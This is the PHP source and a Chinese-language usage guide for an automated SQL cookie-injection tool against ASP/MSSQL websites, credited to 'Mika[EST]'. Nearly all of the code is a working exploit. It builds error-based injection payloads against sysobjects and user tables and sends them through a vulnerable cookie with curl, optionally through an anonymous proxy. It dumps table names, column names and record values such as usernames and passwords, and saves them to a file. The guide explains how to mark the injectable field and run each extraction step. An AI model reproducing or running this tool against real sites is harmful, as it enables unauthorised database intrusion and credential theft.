Asp+Mssql Sql Cookie Injection Tool Beta 1 by Mika[EST]




Exploitable Url: unspecified\n"?>
Exploitable Cookie: unspecified\n"?>
Referer Url: unspecified\n"?>
>Num Type >Char Type
onclick="_tablename.disabled=true;_fieldname.disabled=true;_tabname.disabled=true;">Explode Tables Of Current DataBase
>Explode Fields Of />
>Explode Values Of /> IN />
>Via Anonymous Proxy >


:::Attack Parameters:::
\n"; echo "Target Url:$url
\n"; echo "Target Cookie:\"$cookie\"
\n"; echo "Referer Url:$referer
\n"; echo "Injection Type:"; switch($bstr){ case 'num': echo "number
\n"; $bstr=0;//数字型 break; case 'char': echo "character
\n"; $bstr=1;//字符型 break; } echo "Via Proxy:".((isset($useproxy) && !empty($proxy))? 'Yes':'No')."
\n"; if(isset($useproxy) && !empty($proxy)) echo "Proxy Address:$proxy
\n"; echo "Injection Action:"; switch($action){ case 'exp_tabs': echo "Explode Table Names
\n\n"; exploit_tab(); break; case 'exp_fields': echo "Explode Table Fields
\n"; if(empty($t_name)) die("Error:table name must be specified!
"); $table_name=$t_name; echo "Table Name:$table_name
\n\n"; exploit_field(); break; case 'exp_values': echo "Explode Table Values
\n"; if(empty($tab_name)) die("Error:table name must be specified!
"); elseif(empty($field_name)) die("Error:field name must be specified!
"); $table_name=$tab_name; echo "Table Name:$table_name
\n"; echo "Fields Name:".str_replace(","," ",$field_name)."
\n\n"; explode_value(); break; } } // exploit_tab(); // exploit_field(); // explode_value(); /////////////////////////////////////////////////////////////////////////////////////// function output_start() { echo "

\n"; echo "
\n"; echo "\n"; flush(); } function output_th($th) { switch($th){ case 'tr': echo ""; break; case '/tr': echo "\n"; break; default: echo "\n"; break; } flush(); } function output_td($td) { switch($td){ case 'tr': echo ""; break; case '/tr': echo "\n"; break; default: echo "\n"; break; } flush(); } function output_end() { echo "
$th
$td

\n"; flush(); } /////////////////////////////////////////////////////////////////////////////////////// /////////////////////////////////////////////////////////////////////////////////////// //暴取字段值函数 function explode_value() { global $bstr,$table_name,$field_name,$cookie,$count_exp,$curl; $i=1; $count=0; $fields=explode(",",$field_name); $sql_str=" And (Select Top 1 nchar(124)"; $sub_str='+isNull(cast([MIKA_FIELD] as varchar(8000)),char(32))'; foreach($fields as $field){ $new_sub_str=str_replace('MIKA_FIELD',$field,$sub_str); $sql_str.=$new_sub_str."+char(92)"; } $sql_str=substr($sql_str,0,strlen($sql_str)-9); $sql_str.="+nchar(124) from (Select Top MIKA_NUM $field_name From [MIKA_TABLE] Where 1=1 Order by $field_name) T Order by "; $sub_str="MIKA_FIELD desc"; foreach($fields as $field){ $sub_strs[]=str_replace('MIKA_FIELD',$field,$sub_str); } $sql_str.=implode(",",$sub_strs).")>0--"; //echo $sql_str."\n"; $sql_str=str_replace('MIKA_TABLE',$table_name,$sql_str); $old=str_replace('MFM_TABLE_NAME',$table_name,$count_exp); init_session(); if($bstr) $new_cookie=str_replace('MIKA','%27'.$old,$cookie); else $new_cookie=str_replace('MIKA',$old,$cookie); output_start(); $re=find_value($new_cookie); if($re) { $count=$re; echo "the number of record in $table_name: $count\n"; } output_th('tr'); foreach ($fields as $field){ output_th($field); } output_th('/tr'); do{ $new_sql_str=str_replace('MIKA_NUM',$i,$sql_str); //echo $sql_str."\n"; if($bstr) $new_cookie=str_replace('MIKA','%27'.urlencode($new_sql_str),$cookie); else $new_cookie=str_replace('MIKA',urlencode($new_sql_str),$cookie); $re=find_value($new_cookie); output_td('tr'); if($re) { $res=explode("\\",$re); foreach($res as $ree){ output_td($ree); } } output_td('/tr'); $i++; }while($i<=$count); output_end(); } /////////////////////////////////////////////////////////////////////////////////////// /////////////////////////////////////////////////////////////////////////////////////// //另一种方式暴取表名的函数 function 
explode_tab(){ global $bstr,$curl,$cookie; $num=1; $i=0; $old_re=""; $re=""; $words=" And (Select Top 1 nchar(124)+cast(name as varchar(8000))+nchar(124) from(Select Top MIKA_NUM id,name from sysobjects Where xtype=char(85) order by id) T order by id desc)>0--"; init_session(); output_th('tr'); for($i=0;$i<8;$i++) output_th('Tables'); output_th('/tr'); output_td('tr'); do{ $new_words=str_replace('MIKA_NUM',$num,$words); if($bstr) $new_cookie=str_replace('MIKA',"%27".urlencode($new_words),$cookie); else $new_cookie=str_replace('MIKA',urlencode($new_words),$cookie); $re=find_value($new_cookie); if($re!=$old_re) { output_td($re); if(($num % 8)==0) { output_td('/tr'); output_td('tr'); } } else break; $old_re=$re; $num++; }while($re); output_td('/tr'); output_end(); } /////////////////////////////////////////////////////////////////////////////////////// /////////////////////////////////////////////////////////////////////////////////////// //初始化会话函数 function init_session(){ global $proxy,$curl,$referer,$url; $curl=curl_init(); curl_setopt($curl,CURLOPT_HEADER,0); curl_setopt($curl,CURLOPT_RETURNTRANSFER,1); curl_setopt($curl,CURLOPT_REFERER,$referer); curl_setopt($curl,CURLOPT_URL,$url); if(isset($useproxy) && !empty($proxy)) curl_setopt($curl,CURLOPT_PROXY,"$proxy"); } /////////////////////////////////////////////////////////////////////////////////////// /////////////////////////////////////////////////////////////////////////////////////// //通用取值函数 function find_value($cookie){ global $curl; //echo $cookie."\n"; curl_setopt($curl,CURLOPT_COOKIE,$cookie); $content=curl_exec($curl); //echo $content; $re=preg_match("/(\|.+\|)/i",$content,$result); if($re) { return str_replace('|','',$result[1]); } return 0; } /////////////////////////////////////////////////////////////////////////////////////// /////////////////////////////////////////////////////////////////////////////////////// //字符串转换为msssql的16进制数值 function str2sqlhex($str){ $temp="0x"; for($i=0;$iNumber of 
tables:$re\n"; } /*do{ if($table==Null){ $new_url=str_replace('MFM_TABLES',"''",$tab_exp); } else{ $new_url=str_replace('MFM_TABLES',$temp,$tab_exp); } if($bstr) $new_cookie=str_replace('MIKA','%27'.$new_url,$cookie); else $new_cookie=str_replace('MIKA',$new_url,$cookie); $re=find_value($new_cookie); if($re) { $table=$re; if($temp==Null){ //$temp="'".$table."'"; $temp=str2sqlhex($table); }else{ //$temp.=","."'".$table."'"; $temp.=",".str2sqlhex($table); } fputs($table_file,"|------------+".$table."\n"); echo "|------------+".$table."\n"; } }while($re);*/ explode_tab(); } /////////////////////////////////////////////////////////////////////////////////////// /////////////////////////////////////////////////////////////////////////////////////// //暴取字段函数 function exploit_field(){ global $bstr,$table_name,$cookie,$field_exp,$count_column,$curl; $old_url=str_replace('TABLE_NAME',str2sqlhex($table_name),$field_exp); $count_column=str_replace('MFM_TABLE_NAME',str2sqlhex($table_name),$count_column); $num=1; $i=0; init_session(); if($bstr) $new_cookie=str_replace('MIKA','%27'.$count_column,$cookie); else $new_cookie=str_replace('MIKA',$count_column,$cookie); output_start(); if($re=find_value($new_cookie)){ echo "Number of columns in $table_name:$re\n"; } output_th('tr'); for($i=0;$i<4;$i++) output_th('Fields'); output_th('/tr'); output_td('tr'); do{ $temp=$old_url; $new_url=str_replace('MFM_NUM',"$num",$temp); if($bstr) $new_cookie=str_replace('MIKA','%27'.$new_url,$cookie); else $new_cookie=str_replace('MIKA',$new_url,$cookie); //echo $new_url."\n"; $re=find_value($new_cookie); if($re){ output_td($re); if(($num % 4)==0) { output_td('/tr'); output_td('tr'); } } $num++; }while($re); output_td('/tr'); output_end(); } /////////////////////////////////////////////////////////////////////////////////////// /////////////////////////////////////////////////////////////////////////////////////// //老方式暴取字段值的函数 function exploit_value(){ global 
$bstr,$table_name,$field_name,$cookie,$value_exp,$count_exp,$curl; $value=Null; $temp=Null; $count_num=1; $old=str_replace('MFM_TABLE_NAME',$table_name,$count_exp); init_session(); if($bstr) $new_cookie=str_replace('MIKA','%27'.$old,$cookie); else $new_cookie=str_replace('MIKA',$old,$cookie); $re=find_value($new_cookie); $record_file=fopen("records-$field_name.txt","w"); if($re) { $count=$re; echo "the number of record in $table_name is: $count\n"; fputs($record_file,"the number of record in $table_name is: $count\n"); } $old=str_replace('MFM_FIELD_NAME',$field_name,$value_exp); $old=str_replace('MFM_TABLE_NAME',$table_name,$old); //echo $old."\n"; do{ if($value==Null){ $new_url=str_replace('MFM_VALUE',"''",$old); } else{ $new_url=str_replace('MFM_VALUE',$temp,$old); } if($bstr) $new_cookie=str_replace('MIKA','%27'.$new_url,$cookie); else $new_cookie=str_replace('MIKA',$new_url,$cookie); $re=find_value($new_cookie); if($re) { $value=$re; echo "|------------+ ".$value."\n"; fputs($record_file,"|------------+ ".$value."\n"); if($temp==Null){ //$temp="'".urlencode($value)."'"; //$temp=urlencode("'".urlencode($value)."'"); $temp=str2sqlhex($value); //echo $temp."\n"; }else{ //$temp.=","."'".urlencode($value)."'"; //$temp.=",".urlencode("'".urlencode($value)."'"); $temp.=",".str2sqlhex($value); } }else{echo "|------------+ None\n"; fputs($record_file,"|------------+ None\n");} $count_num++; }while($count_num<=$count); fclose($record_file); } /////////////////////////////////////////////////////////////////////////////////////// ?>

cookie注入辅助工具 by mika[EST]


只针对mssql数据库,且错误提示开启。
用法非常简单:
首先将实际获得的cookie填入"exploitable cookie"栏里,并在可注入的字段后面加上MIKA这个关键字,如下例所示,不要有空格。比如下面这个cookie:
"my web=myset=template; ASPSESSIONIDCSRRARBS=PIHLHHPDOFMCKJIBBIMMLCJL"
其中myset这个字段没有过滤好,存在注入漏洞,那么你就需要在template后面加上MIKA这个关键字,因此$cookie全局变量就成了如下这个样子:
$cookie="my web=myset=templateMIKA; ASPSESSIONIDCSRRARBS=PIHLHHPDOFMCKJIBBIMMLCJL";
"Exploitable Url"填存在漏洞的页面url地址。"referer url"填写http头里的referer字段的内容,一般情况下跟"Exploitable Url" 一样就可以了。
"Num Type"和"Char Type"是注入的类型,前者代表数值型,后者代表字符型,根据实际情况填写即可。
"Explode Tables Of Current DataBase" 爆取当前数据库的所有表名。
"Explode Fields Of" 爆取某个表的字段名,后面填上要暴取字段的表名.
"Explode Values Of" 暴取某个表的字段值。后面两个文本框,从左到右依次填写字段名和表名。其中字段名可以一次填写多个,以逗号(",")隔开,比如:
username,password,userid
"Via Anonymous Proxy" 是选择是否使用匿名HTTP代理,代理地址格式为"127.0.0.1:8080".
by mika[EST]